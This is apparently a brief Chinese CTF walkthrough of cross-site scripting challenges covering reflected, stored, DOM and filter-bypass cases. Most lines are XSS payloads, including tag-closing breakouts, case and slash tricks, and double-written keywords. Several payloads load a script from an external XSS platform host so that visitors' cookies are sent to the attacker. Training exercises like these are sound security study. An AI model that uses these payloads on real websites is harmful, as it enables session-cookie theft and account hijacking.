反射型
写入代码出现弹窗
查看脚本
输入网页脚本+脚本
查看cookie获取flag
存储型
写入代码查看是否出现弹窗
插入脚本
<sCRiPt sRC=//uj.ci/1b1></sCrIpT>
插入脚本后将网址输入
去平台查看cookie获取flag
DOM反射
写入代码查看是否出现弹窗,查看源码发现存在xss但需要闭合后才可以出现弹窗
</script><script>alert(1)</script>
查看脚本注意闭合(利用xss平台的脚本代码)
</tEXtArEa>'"><sCRiPt sRC=//uj.ci/1b1></sCrIpT>
查看cookie获取flag
DOM跳转
检查是否存在弹窗,可以放在url地址栏上执行
?jumpto=javascript:alert(1)
放入脚本,使用$.getScript功能是异步加载并执行
?jumpto=javascript:$.getScript("//uj.ci/1b1")
查看cookie获取flag
过滤空格
检查是否存在弹窗
<script>alert(1)</script>
将代码带入
有空格,用/代替
<sCRiPt/sRC=//uj.ci/1b1></sCrIpT>
查看cookie获取flag
过滤关键词
检测是否出现弹窗利用双写绕过过滤
<scrscriptipt>alert(1)</scrscriptipt>
输入脚本执行
查看cookie获取flag